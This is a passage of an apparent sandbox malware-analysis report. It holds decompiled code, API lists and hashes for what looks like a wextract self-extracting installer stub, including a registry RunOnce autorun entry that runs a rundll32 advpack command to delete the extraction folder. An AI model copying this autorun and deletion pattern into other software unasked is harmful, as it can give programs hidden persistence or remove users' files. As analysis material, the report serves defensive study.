                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(E00976EF0); // executed
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x00976f45
                                                                                                                                                                                                                                              0x00976f4d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00976F45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: 43df864b00c3d68b50c4eb33ff4bd3d619a2f842f1331c7c3816c69886d752c1
                                                                                                                                                                                                                                              • Instruction ID: 6419fa9fa035bfde65d9a6d47b6967c3158b92aaac233d9303cf3f833be5067b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43df864b00c3d68b50c4eb33ff4bd3d619a2f842f1331c7c3816c69886d752c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE90026626950047A6501B749D1955975915ECD616BC19460A019C4494DB604490A522
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E0097202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				void* _v532;
                                                                                                                                                                                                                                              				int _v536;
                                                                                                                                                                                                                                              				int _v540;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				void _t56;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				intOrPtr* _t81;
                                                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t79 = __edx;
                                                                                                                                                                                                                                              				_t28 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                              				_t84 = 0x104;
                                                                                                                                                                                                                                              				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                              				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                                                                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					L24:
                                                                                                                                                                                                                                              					return E00976CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(_t86);
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E0097171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                              					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                              					if(_t41 != 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t87 = _t87 + 1;
                                                                                                                                                                                                                                              					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                              					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                              					_t79 = _t84;
                                                                                                                                                                                                                                              					E0097658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                              					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                              					_t84 = _t46;
                                                                                                                                                                                                                                              					if(_t84 == 0) {
                                                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x979a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              							L17:
                                                                                                                                                                                                                                              							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							_pop(_t86);
                                                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						_t72 =  &_v268;
                                                                                                                                                                                                                                              						_t80 = _t72 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t49 =  *_t72;
                                                                                                                                                                                                                                              							_t72 = _t72 + 1;
                                                                                                                                                                                                                                              						} while (_t49 != 0);
                                                                                                                                                                                                                                              						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                              						_t81 = 0x9791e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t50 =  *_t81;
                                                                                                                                                                                                                                              							_t81 = _t81 + 1;
                                                                                                                                                                                                                                              						} while (_t50 != 0);
                                                                                                                                                                                                                                              						_t84 = _t73 + 0x50 + _t81 - 0x9791e5;
                                                                                                                                                                                                                                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x9791e5);
                                                                                                                                                                                                                                              						if(_t90 != 0) {
                                                                                                                                                                                                                                              							 *0x978580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              							E0097171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                              							_t75 = _t90;
                                                                                                                                                                                                                                              							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                              							_t79 = _t23;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t56 =  *_t75;
                                                                                                                                                                                                                                              								_t75 = _t75 + 1;
                                                                                                                                                                                                                                              							} while (_t56 != 0);
                                                                                                                                                                                                                                              							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                              							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                              							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                              							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t79 = 0x4b5;
                                                                                                                                                                                                                                              						E009744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                              					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                              					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                              					if(_t91 == 0) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              						E0097658A( &_v268, 0x104, 0x971140);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              				 *0x978530 = _t66;
                                                                                                                                                                                                                                              				goto L23;
                                                                                                                                                                                                                                              			}


































                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972050
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0097205F
                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0097208C
                                                                                                                                                                                                                                                • Part of subcall function 0097171E: _vsnprintf.MSVCRT ref: 00971750
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009720C9
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009720EA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00972103
                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972122
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00972134
                                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972144
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 0097215B
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0097218C
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009721C1
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009721E4
                                                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0097223D
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972249
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00972250
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                              • API String ID: 178549006-3726664654
                                                                                                                                                                                                                                              • Opcode ID: e7d9d74723e4e9f5f5883c60892e3b05e1946b0257b56abf81311722af67d02a
                                                                                                                                                                                                                                              • Instruction ID: bfd36da9921cc9abd886a6eb51d04763a106f72dace3d7abc9443eaecf22060b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7d9d74723e4e9f5f5883c60892e3b05e1946b0257b56abf81311722af67d02a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0510673A68214ABDB249B64DC4DFEB776CFBC1700F0081A8FA4DE6151DA709E85DB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 232 9755a0-9755d9 call 97468f LocalAlloc 235 9755fd-97560c call 97468f 232->235 236 9755db-9755f1 call 9744b9 call 976285 232->236 241 975632-975643 lstrcmpA 235->241 242 97560e-975630 call 9744b9 LocalFree 235->242 248 9755f6-9755f8 236->248 245 975645 241->245 246 97564b-975659 LocalFree 241->246 242->248 245->246 250 975696-97569c 246->250 251 97565b-97565d 246->251 252 9758b7-9758c7 call 976ce0 248->252 253 9756a2-9756a8 250->253 254 97589f-9758b5 call 976517 250->254 255 97565f-975667 251->255 256 975669 251->256 253->254 259 9756ae-9756c1 GetTempPathA 253->259 254->252 255->256 260 97566b-97567a call 975467 255->260 256->260 263 9756f3-975711 call 971781 259->263 264 9756c3-9756c9 call 975467 259->264 269 975680-975691 call 9744b9 260->269 270 97589b-97589d 260->270 274 975717-975729 GetDriveTypeA 263->274 275 97586c-975890 GetWindowsDirectoryA call 97597d 263->275 272 9756ce-9756d0 264->272 269->248 270->252 272->270 276 9756d6-9756df call 972630 272->276 278 975730-975740 GetFileAttributesA 274->278 279 97572b-97572e 274->279 275->263 288 975896 275->288 276->263 289 9756e1-9756ed call 975467 276->289 282 975742-975745 278->282 283 97577e-97578f call 97597d 278->283 279->278 279->282 286 975747-97574f 282->286 287 97576b 282->287 295 9757b2-9757bf call 972630 283->295 296 975791-97579e call 972630 283->296 292 975771-975779 286->292 293 975751-975753 286->293 287->292 288->270 289->263 289->270 298 975864-975866 292->298 293->292 297 975755-975762 call 976952 293->297 307 9757d3-9757f8 call 97658a GetFileAttributesA 295->307 308 9757c1-9757cd GetWindowsDirectoryA 295->308 296->287 306 9757a0-9757b0 call 97597d 296->306 297->287 309 975764-975769 297->309 298->274 298->275 306->287 306->295 314 97580a 
307->314 315 9757fa-975808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 97580d-97580f 314->316 315->316 317 975827-97585c SetFileAttributesA call 971781 call 975467 316->317 318 975811-975825 316->318 317->270 323 97585e 317->323 318->298 323->298
                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E009755A0(void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v265;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				int _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t35;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                                                                              				long _t48;
                                                                                                                                                                                                                                              				int _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				char _t60;
                                                                                                                                                                                                                                              				int _t65;
                                                                                                                                                                                                                                              				char _t66;
                                                                                                                                                                                                                                              				int _t67;
                                                                                                                                                                                                                                              				int _t68;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				int _t70;
                                                                                                                                                                                                                                              				int _t71;
                                                                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                              				int _t73;
                                                                                                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                                                                                                              				CHAR* _t88;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                              				_t2 = E0097468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                              				if(_t109 != 0) {
                                                                                                                                                                                                                                              					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                              					_t32 = E0097468F(_t82, _t109, 1);
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                              						__eflags = _t33;
                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                              							 *0x979a30 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						_t35 =  *0x978b3e; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t35;
                                                                                                                                                                                                                                              						if(_t35 == 0) {
                                                                                                                                                                                                                                              							__eflags =  *0x978a24; // 0x0
                                                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                                                              								L46:
                                                                                                                                                                                                                                              								_t101 = 0x7d2;
                                                                                                                                                                                                                                              								_t36 = E00976517(_t82, 0x7d2, 0, E00973210, 0, 0);
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0x979a30; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t109 = 0x9791e4;
                                                                                                                                                                                                                                              									_t40 = GetTempPathA(0x104, 0x9791e4);
                                                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                                                              										L19:
                                                                                                                                                                                                                                              										_push(_t82);
                                                                                                                                                                                                                                              										E00971781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                              										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                              										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                              											do {
                                                                                                                                                                                                                                              												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                              												__eflags = _t109 - 6;
                                                                                                                                                                                                                                              												if(_t109 == 6) {
                                                                                                                                                                                                                                              													L22:
                                                                                                                                                                                                                                              													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                              													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L23;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													__eflags = _t109 - 3;
                                                                                                                                                                                                                                              													if(_t109 != 3) {
                                                                                                                                                                                                                                              														L23:
                                                                                                                                                                                                                                              														__eflags = _t109 - 2;
                                                                                                                                                                                                                                              														if(_t109 != 2) {
                                                                                                                                                                                                                                              															L28:
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															goto L29;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                              															if(_t66 == 0x41) {
                                                                                                                                                                                                                                              																L29:
                                                                                                                                                                                                                                              																_t60 = _t66 + 1;
                                                                                                                                                                                                                                              																_v268 = _t60;
                                                                                                                                                                                                                                              																goto L42;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                              																if(_t66 == 0x42) {
                                                                                                                                                                                                                                              																	goto L29;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t68 = E00976952( &_v268);
                                                                                                                                                                                                                                              																	__eflags = _t68;
                                                                                                                                                                                                                                              																	if(_t68 == 0) {
                                                                                                                                                                                                                                              																		goto L28;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                              																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                              																			L30:
                                                                                                                                                                                                                                              																			_push(0);
                                                                                                                                                                                                                                              																			_t103 = 3;
                                                                                                                                                                                                                                              																			_t49 = E0097597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                              																			__eflags = _t49;
                                                                                                                                                                                                                                              																			if(_t49 != 0) {
                                                                                                                                                                                                                                              																				L33:
                                                                                                                                                                                                                                              																				_t50 = E00972630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t50;
                                                                                                                                                                                                                                              																				if(_t50 != 0) {
                                                                                                                                                                                                                                              																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t88 =  &_v268;
                                                                                                                                                                                                                                              																				E0097658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                              																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                              																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                              																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                              																					__eflags = _t54;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				__eflags = _t54;
                                                                                                                                                                                                                                              																				if(_t54 != 0) {
                                                                                                                                                                                                                                              																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                              																					_push(_t88);
                                                                                                                                                                                                                                              																					_t109 = 0x9791e4;
                                                                                                                                                                                                                                              																					E00971781(0x9791e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                              																					_t101 = 1;
                                                                                                                                                                                                                                              																					_t59 = E00975467(0x9791e4, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t59;
                                                                                                                                                                                                                                              																					if(_t59 != 0) {
                                                                                                                                                                                                                                              																						goto L45;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t60 = _v268;
                                                                                                                                                                                                                                              																						goto L42;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                              																					_v265 = 0;
                                                                                                                                                                                                                                              																					_v268 = _t60;
                                                                                                                                                                                                                                              																					goto L42;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				_t65 = E00972630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t65;
                                                                                                                                                                                                                                              																				if(_t65 != 0) {
                                                                                                                                                                                                                                              																					goto L28;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t67 = E0097597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t67;
                                                                                                                                                                                                                                              																					if(_t67 == 0) {
                                                                                                                                                                                                                                              																						goto L28;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						goto L33;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			goto L28;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L22;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L47;
                                                                                                                                                                                                                                              												L42:
                                                                                                                                                                                                                                              												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                              											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										goto L43;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t101 = 1;
                                                                                                                                                                                                                                              										_t69 = E00975467(0x9791e4, 1, 3); // executed
                                                                                                                                                                                                                                              										__eflags = _t69;
                                                                                                                                                                                                                                              										if(_t69 != 0) {
                                                                                                                                                                                                                                              											goto L45;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t82 = 0x9791e4;
                                                                                                                                                                                                                                              											_t70 = E00972630(0, 0x9791e4, 1);
                                                                                                                                                                                                                                              											__eflags = _t70;
                                                                                                                                                                                                                                              											if(_t70 != 0) {
                                                                                                                                                                                                                                              												goto L19;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t101 = 1;
                                                                                                                                                                                                                                              												_t82 = 0x9791e4;
                                                                                                                                                                                                                                              												_t71 = E00975467(0x9791e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0097597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x978b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00975467(0x978b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E009744B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x979124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x979124 = E00976285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00976CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}
                                                                                                                                                                                                                                              0x00975781
                                                                                                                                                                                                                                              0x00975788
                                                                                                                                                                                                                                              0x0097578d
                                                                                                                                                                                                                                              0x0097578f
                                                                                                                                                                                                                                              0x009757b2
                                                                                                                                                                                                                                              0x009757b8
                                                                                                                                                                                                                                              0x009757bd
                                                                                                                                                                                                                                              0x009757bf
                                                                                                                                                                                                                                              0x009757cd
                                                                                                                                                                                                                                              0x009757cd
                                                                                                                                                                                                                                              0x009757dd
                                                                                                                                                                                                                                              0x009757e3
                                                                                                                                                                                                                                              0x009757ef
                                                                                                                                                                                                                                              0x009757f5
                                                                                                                                                                                                                                              0x009757f8
                                                                                                                                                                                                                                              0x0097580a
                                                                                                                                                                                                                                              0x0097580a
                                                                                                                                                                                                                                              0x009757fa
                                                                                                                                                                                                                                              0x00975802
                                                                                                                                                                                                                                              0x00975802
                                                                                                                                                                                                                                              0x0097580d
                                                                                                                                                                                                                                              0x0097580f
                                                                                                                                                                                                                                              0x00975830
                                                                                                                                                                                                                                              0x00975836
                                                                                                                                                                                                                                              0x0097583d
